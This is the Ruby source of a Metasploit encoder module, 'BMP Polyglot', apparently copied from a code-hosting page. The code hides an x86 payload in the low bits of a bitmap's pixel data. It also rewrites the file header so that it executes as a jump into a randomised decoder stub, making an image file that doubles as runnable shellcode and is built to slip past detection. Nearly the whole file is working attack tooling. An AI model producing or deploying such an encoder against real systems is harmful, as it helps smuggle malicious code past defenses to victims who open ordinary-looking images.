420 lines
16 KiB
Ruby
420 lines
16 KiB
Ruby
##
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# This module requires Metasploit: http://metasploit.com/download
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# Current source: https://github.com/rapid7/metasploit-framework
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##
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require 'rex/poly'
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require 'msf/core'
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=begin
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[BITS 32]
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global _start
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_start:
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pushad ; backup all registers
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call get_eip ; get the value of eip
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get_eip:
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pop esi ; and put it into esi to use as the source
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add esi, 0x30 ; advance esi to skip this decoder stub
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mov edi, esi ; copy it to edi which is where to start writing
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add esi, 0x1234 ; increase the source to skip any padding
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mov ecx, 0x1234 ; set the byte counter
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get_byte: ; <---------------------------------------------------------\
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xor eax, eax ; clear eax which is where our newly decoded byte will go |
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push ecx ; preserve the byte counter |
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xor ecx, ecx ; set the counter to 0 |
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mov cl, 8 ; set the counter to 8 (for bits) |
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get_bit: ; <------------------------------------------------------\ |
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shl eax, 1 ; shift eax one to make room for the next bit | |
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mov bl, byte [esi] ; read a byte from the source register | |
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inc esi ; advance the source register by a byte | |
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and bl, 1 ; extract the value of the least-significant bit | |
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or al, bl ; put the least-significat bit into eax | |
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dec ecx ; decrement the bit counter | |
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jne short get_bit ; -------------------------------------------------------/ |
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; |
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; get bit loop is done |
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pop ecx ; restore the byte counter |
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mov byte [edi], al ; move the newly decoded byte to its final destination |
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inc edi ; increment the destination pointer |
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; |
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dec ecx ; decrement the byte counter |
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jne get_byte ; ----------------------------------------------------------/
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; get byte loop is done
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popad ; restore all registers
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=end
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# calculate the smallest increase of a 32-bit little endian integer which is
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# also a valid x86 jmp opcode of the specified minimum size.
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class SizeCalculator
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BYTE_NOPS = [
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0x42, # inc edx
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0x45, # inc ebp
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0x4a, # dec edx
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0x4d, # dec ebp
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0x90, # xchg eax, eax / nop
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0xf5, # cmc
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0xf8, # clc
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0xf9, # stc
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0xfc, # cld
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0xfd # std
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]
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def initialize(size, minimum_jump)
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@original_size = size
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raise if minimum_jump < 0 || minimum_jump > 0xff
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@minimum_jump = minimum_jump
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end
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def calculate
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possibles = []
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size = new_size_long
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possibles << size unless size.nil?
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size = new_size_short
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possibles << size unless size.nil?
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return if possibles.length == 0
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possibles.min
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end
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def new_size_long
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size = [ @original_size ].pack('V').unpack('CCCC')
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0.upto(2) do |i|
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byte_0 = size[i]
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byte_1 = size[i + 1]
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byte_2 = size[i + 2].to_i
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byte_3 = size[i + 3].to_i
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byte_4 = size[i + 4].to_i
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min_jmp = (@minimum_jump - 5 - i)
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if byte_2 + byte_3 + byte_4 > 0 # this jmp would be too large
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if byte_0 > 0xfd
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size = increment_size(size, i)
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end
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size[i] = round_up_to_nop(byte_0)
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next
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end
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if byte_0 > 0xe9
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if byte_0 > 0xfd
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size = increment_size(size, i)
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end
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size[i] = round_up_to_nop(byte_0)
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else
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size[i] = 0xe9
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byte_1 = min_jmp if byte_1 < min_jmp
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size[i + 1] = byte_1
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return size.pack('CCCC').unpack('V')[0]
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end
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end
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end
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def new_size_short
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return if @minimum_jump > 0x81 # short won't make it in this case (0x7f + 0.upto(2).to_a.max)
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size = [ @original_size ].pack('V').unpack('CCCC')
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0.upto(2) do |i|
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byte_0 = size[i]
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byte_1 = size[i + 1]
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min_jmp = (@minimum_jump - 2 - i)
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if byte_0 > 0xeb
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if byte_0 > 0xfd
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size = increment_size(size, i)
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end
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size[i] = round_up_to_nop(byte_0)
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else
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size[i] = 0xeb
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if byte_1 > 0x7f
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byte_1 = min_jmp
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size = increment_size(size, i + 1)
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elsif byte_1 < min_jmp
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byte_1 = min_jmp
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end
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size[i + 1] = byte_1
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return size.pack('CCCC').unpack('V')[0]
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end
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end
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end
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def size_to_jmp(size)
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jmp = 0
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packed = [ size, 0 ].pack('VV')
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until [ "\xe9", "\xeb" ].include?(packed[0])
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packed = packed[1..-1]
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jmp += 1
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end
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if packed[0] == "\xe9"
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jmp += packed[1..4].unpack('V')[0]
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jmp += 5
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elsif packed[0] == "\xeb"
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jmp += packed[1].unpack('C')[0]
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jmp += 2
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end
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jmp
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end
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private
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def increment_size(size, byte)
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size = size.pack('CCCC').unpack('V')[0]
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size += (0x0100 << byte * 8)
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[ size ].pack('V').unpack('CCCC')
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end
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def round_up_to_nop(opcode)
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BYTE_NOPS.find { |nop| opcode <= nop }
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end
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end
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class MetasploitModule < Msf::Encoder
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Rank = ManualRanking
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DESTEGO_STUB_SIZE = 53
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# bitmap header sizes
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BM_HEADER_SIZE = 14
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DIB_HEADER_SIZE = 40
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def initialize
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super(
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'Name' => 'BMP Polyglot',
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'Description' => %q{
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Encodes a payload in such a way that the resulting binary blob is both
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valid x86 shellcode and a valid bitmap image file (.bmp). The selected
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bitmap file to inject into must use the BM (Windows 3.1x/95/NT) header
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and the 40-byte Windows 3.1x/NT BITMAPINFOHEADER. Additionally the file
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must use either 24 or 32 bits per pixel as the color depth and no
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compression. This encoder makes absolutely no effort to remove any
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invalid characters.
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},
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'Author' => 'Spencer McIntyre',
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'Arch' => ARCH_X86,
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'License' => MSF_LICENSE,
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'References' =>
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[
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[ 'URL' => 'https://warroom.securestate.com/bmp-x86-polyglot/' ]
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]
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)
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register_options(
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[
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OptString.new('BitmapFile', [ true, 'The .bmp file to inject into' ])
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],
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self.class)
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end
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def can_preserve_registers?
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true
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end
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def preserves_stack?
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true
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end
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def make_pad(size)
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(0...size).map { (rand(0x100)).chr }.join
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end
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def modified_registers
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# these two registers are modified by the initial BM header
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# B 0x42 inc edx
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# M 0x4d dec ebp
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[
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Rex::Arch::X86::EBP, Rex::Arch::X86::EDX
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]
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end
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# take the original size and calculate a new one that meets the following
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# requirements:
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# - large enough to store all of the image data and the assembly stub
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# - is also a valid x86 jmp instruction to land on the assembly stub
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def calc_new_size(orig_size, stub_length)
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minimum_jump = BM_HEADER_SIZE + DIB_HEADER_SIZE - 2 # -2 for the offset of the size in the BM header
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calc = SizeCalculator.new(orig_size + stub_length, minimum_jump)
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size = calc.calculate.to_i
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raise EncodingError, 'Bad .bmp, failed to calculate jmp for size' if size < orig_size
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jump = calc.size_to_jmp(size)
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pre_pad = jump - minimum_jump
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post_pad = size - orig_size - stub_length - pre_pad
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return { :new_size => size, :post_pad => post_pad, :pre_pad => pre_pad }
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end
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# calculate the least number of bits that must be modified to place the
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# shellcode buffer into the image data
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def calc_required_lsbs(sc_len, data_len)
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return 1 if sc_len * 8 <= data_len
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return 2 if sc_len * 4 <= data_len
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return 4 if sc_len * 2 <= data_len
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raise EncodingError, 'Bad .bmp, not enough image data for stego operation'
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end
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# asm stub that will extract the payload from the least significant bits of
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# the binary data which directly follows it
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def make_destego_stub(shellcode_size, padding, lsbs = 1)
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raise RuntimeError, 'Invalid number of storage bits' unless [1, 2, 4].include?(lsbs)
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gen_regs = [ 'eax', 'ebx', 'ecx', 'edx' ].shuffle
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ptr_regs = [ 'edi', 'esi' ].shuffle
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# declare logical registers
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dst_addr_reg = Rex::Poly::LogicalRegister::X86.new('dst_addr', ptr_regs.pop)
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src_addr_reg = Rex::Poly::LogicalRegister::X86.new('src_addr', ptr_regs.pop)
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ctr_reg = Rex::Poly::LogicalRegister::X86.new('ctr', gen_regs.pop)
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byte_reg = Rex::Poly::LogicalRegister::X86.new('byte', gen_regs.pop)
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bit_reg = Rex::Poly::LogicalRegister::X86.new('bit', gen_regs.pop)
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endb = Rex::Poly::SymbolicBlock::End.new
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get_eip_nop = Proc.new { |b| [0x90, 0x40 + b.regnum_of([bit_reg, byte_reg, dst_addr_reg, src_addr_reg].sample), 0x48 + b.regnum_of([bit_reg, byte_reg, dst_addr_reg, src_addr_reg].sample)].sample.chr }
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get_eip = Proc.new { |b|
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[
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Proc.new { |b| "\xe8" + [0, 1].sample.chr + "\x00\x00\x00" + get_eip_nop.call(b) + (0x58 + b.regnum_of(src_addr_reg)).chr },
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Proc.new { |b| "\xe8\xff\xff\xff\xff" + (0xc0 + b.regnum_of([bit_reg, byte_reg, dst_addr_reg, src_addr_reg].sample)).chr + (0x58 + b.regnum_of(src_addr_reg)).chr },
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].sample.call(b)
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}
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set_src_addr = Proc.new { |b, o| "\x83" + (0xc0 + b.regnum_of(src_addr_reg)).chr + [ b.offset_of(endb) + o ].pack('c') }
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set_dst_addr = Proc.new { |b| "\x89" + (0xc0 + (b.regnum_of(src_addr_reg) << 3) + b.regnum_of(dst_addr_reg)).chr }
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set_byte_ctr = Proc.new { |b| (0xb8 + b.regnum_of(ctr_reg)).chr + [ shellcode_size ].pack('V') }
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adjust_src_addr = Proc.new { |b| "\x81" + (0xc0 + b.regnum_of(src_addr_reg)).chr + [ padding ].pack('V') }
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initialize = Rex::Poly::LogicalBlock.new('initialize',
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Proc.new { |b| "\x60" + get_eip.call(b) + set_src_addr.call(b, -6) + set_dst_addr.call(b) + adjust_src_addr.call(b) + set_byte_ctr.call(b) },
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Proc.new { |b| "\x60" + get_eip.call(b) + set_src_addr.call(b, -6) + set_dst_addr.call(b) + set_byte_ctr.call(b) + adjust_src_addr.call(b) },
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Proc.new { |b| "\x60" + get_eip.call(b) + set_src_addr.call(b, -6) + set_byte_ctr.call(b) + set_dst_addr.call(b) + adjust_src_addr.call(b) },
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Proc.new { |b| "\x60" + get_eip.call(b) + set_byte_ctr.call(b) + set_src_addr.call(b, -6) + set_dst_addr.call(b) + adjust_src_addr.call(b) },
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Proc.new { |b| "\x60" + set_byte_ctr.call(b) + get_eip.call(b) + set_src_addr.call(b, -11) + set_dst_addr.call(b) + adjust_src_addr.call(b) },
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)
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clr_byte_reg = Proc.new { |b| [0x29, 0x2b, 0x31, 0x33].sample.chr + (0xc0 + (b.regnum_of(byte_reg) << 3) + b.regnum_of(byte_reg)).chr }
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clr_ctr = Proc.new { |b| [0x29, 0x2b, 0x31, 0x33].sample.chr + (0xc0 + (b.regnum_of(ctr_reg) << 3) + b.regnum_of(ctr_reg)).chr }
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backup_byte_ctr = Proc.new { |b| (0x50 + b.regnum_of(ctr_reg)).chr }
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set_bit_ctr = Proc.new { |b| (0xb0 + b.regnum_of(ctr_reg)).chr + (8 / lsbs).chr }
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get_byte_loop = Rex::Poly::LogicalBlock.new('get_byte_loop',
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Proc.new { |b| clr_byte_reg.call(b) + backup_byte_ctr.call(b) + clr_ctr.call(b) + set_bit_ctr.call(b) },
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Proc.new { |b| backup_byte_ctr.call(b) + clr_byte_reg.call(b) + clr_ctr.call(b) + set_bit_ctr.call(b) },
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Proc.new { |b| backup_byte_ctr.call(b) + clr_ctr.call(b) + clr_byte_reg.call(b) + set_bit_ctr.call(b) },
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Proc.new { |b| backup_byte_ctr.call(b) + clr_ctr.call(b) + set_bit_ctr.call(b) + clr_byte_reg.call(b) },
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)
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get_byte_loop.depends_on(initialize)
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shift_byte_reg = Rex::Poly::LogicalBlock.new('shift_byte_reg',
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Proc.new { |b| "\xc1" + (0xe0 + b.regnum_of(byte_reg)).chr + lsbs.chr }
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)
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read_byte = Rex::Poly::LogicalBlock.new('read_byte',
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Proc.new { |b| "\x8a" + ((b.regnum_of(bit_reg) << 3) + b.regnum_of(src_addr_reg)).chr }
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)
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inc_src_reg = Rex::Poly::LogicalBlock.new('inc_src_reg',
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Proc.new { |b| (0x40 + b.regnum_of(src_addr_reg)).chr }
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)
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inc_src_reg.depends_on(read_byte)
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get_lsb = Rex::Poly::LogicalBlock.new('get_lsb',
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Proc.new { |b| "\x80" + (0xe0 + b.regnum_of(bit_reg)).chr + (0xff >> (8 - lsbs)).chr }
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)
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get_lsb.depends_on(read_byte)
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put_lsb = Rex::Poly::LogicalBlock.new('put_lsb',
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Proc.new { |b| "\x08"+ (0xc0 + (b.regnum_of(bit_reg) << 3) + b.regnum_of(byte_reg)).chr }
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)
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put_lsb.depends_on(get_lsb, shift_byte_reg)
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jmp_bit_loop_body = Rex::Poly::LogicalBlock.new('jmp_bit_loop_body')
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jmp_bit_loop_body.depends_on(put_lsb, inc_src_reg)
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jmp_bit_loop = Rex::Poly::LogicalBlock.new('jmp_bit_loop',
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Proc.new { |b| (0x48 + b.regnum_of(ctr_reg)).chr + "\x75" + (0xfe + -12).chr }
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)
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jmp_bit_loop.depends_on(jmp_bit_loop_body)
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get_bit_loop = Rex::Poly::LogicalBlock.new('get_bit_loop_body', jmp_bit_loop.generate([ Rex::Arch::X86::EBP, Rex::Arch::X86::ESP ]))
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get_bit_loop.depends_on(get_byte_loop)
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put_byte = Proc.new { |b| "\x88" + (0x00 + (b.regnum_of(byte_reg) << 3) + b.regnum_of(dst_addr_reg)).chr }
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inc_dst_reg = Proc.new { |b| (0x40 + b.regnum_of(dst_addr_reg)).chr }
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restore_byte_ctr = Proc.new { |b| (0x58 + b.regnum_of(ctr_reg)).chr }
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get_byte_post = Rex::Poly::LogicalBlock.new('get_byte_post',
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Proc.new { |b| put_byte.call(b) + inc_dst_reg.call(b) + restore_byte_ctr.call(b) },
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Proc.new { |b| put_byte.call(b) + restore_byte_ctr.call(b) + inc_dst_reg.call(b) },
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Proc.new { |b| restore_byte_ctr.call(b) + put_byte.call(b) + inc_dst_reg.call(b) },
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)
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get_byte_post.depends_on(get_bit_loop)
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jmp_byte_loop_body = Rex::Poly::LogicalBlock.new('jmp_byte_loop_body',
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Proc.new { |b| (0x48 + b.regnum_of(ctr_reg)).chr + "\x75" + (0xfe + -26).chr }
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)
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jmp_byte_loop_body.depends_on(get_byte_post)
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finalize = Rex::Poly::LogicalBlock.new('finalize', "\x61")
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finalize.depends_on(jmp_byte_loop_body)
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return finalize.generate([ Rex::Arch::X86::EBP, Rex::Arch::X86::ESP ])
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end
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def stegoify(shellcode, data, lsbs = 1)
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clr_mask = ((0xff << lsbs) & 0xff)
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set_mask = clr_mask ^ 0xff
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iter_count = 8 / lsbs
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shellcode.each_char.with_index do |sc_byte, index|
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sc_byte = sc_byte.ord
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0.upto(iter_count - 1) do |bit_pos|
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data_pos = (index * (8 / lsbs)) + bit_pos
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shift = 8 - (lsbs * (bit_pos + 1))
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d_byte = data[data_pos].ord
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d_byte &= clr_mask
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d_byte |= ((sc_byte & (set_mask << shift)) >> shift)
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data[data_pos] = d_byte.chr
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end
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end
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data
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end
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def validate_dib_header(dib_header)
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size, _, _, _, bbp, compression, _, _, _, _, _ = dib_header.unpack('VVVvvVVVVVV')
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raise EncodingError, 'Bad .bmp DIB header, must be 40-byte BITMAPINFOHEADER' if size != DIB_HEADER_SIZE
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raise EncodingError, 'Bad .bmp DIB header, bits per pixel must be must be either 24 or 32' if bbp != 24 && bbp != 32
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raise EncodingError, 'Bad .bmp DIB header, compression can not be used' if compression != 0
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end
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def encode(buf, badchars = nil, state = nil, platform = nil)
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in_bmp = File.open(datastore['BitmapFile'], 'rb')
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header = in_bmp.read(BM_HEADER_SIZE)
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dib_header = in_bmp.read(DIB_HEADER_SIZE)
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image_data = in_bmp.read
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in_bmp.close
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header, original_size, _, _, original_offset = header.unpack('vVvvV')
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raise EncodingError, 'Bad .bmp header, must be 0x424D (BM)' if header != 0x4d42
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validate_dib_header(dib_header)
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lsbs = calc_required_lsbs(buf.length, image_data.length)
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details = calc_new_size(original_size, DESTEGO_STUB_SIZE)
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destego_stub = make_destego_stub(buf.length, details[:post_pad], lsbs)
|
|
if destego_stub.length != DESTEGO_STUB_SIZE
|
|
# this is likely a coding error caused by updating the make_destego_stub
|
|
# method but not the DESTEGO_STUB_SIZE constant
|
|
raise EncodingError, 'Bad destego stub size'
|
|
end
|
|
|
|
pre_image_data = make_pad(details[:pre_pad]) + destego_stub + make_pad(details[:post_pad])
|
|
new_offset = original_offset + pre_image_data.length
|
|
|
|
bmp_img = ''
|
|
bmp_img << [0x4d42, details[:new_size], 0, 0, new_offset].pack('vVvvV')
|
|
bmp_img << dib_header
|
|
bmp_img << pre_image_data
|
|
bmp_img << stegoify(buf, image_data, lsbs)
|
|
bmp_img
|
|
end
|
|
end
|